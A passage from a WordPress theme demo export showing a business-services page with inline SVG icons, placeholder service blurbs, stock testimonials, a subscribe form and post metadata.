				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"class="link-details"> Learn More</a>
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>885</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:16:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:16:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services-with-icon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
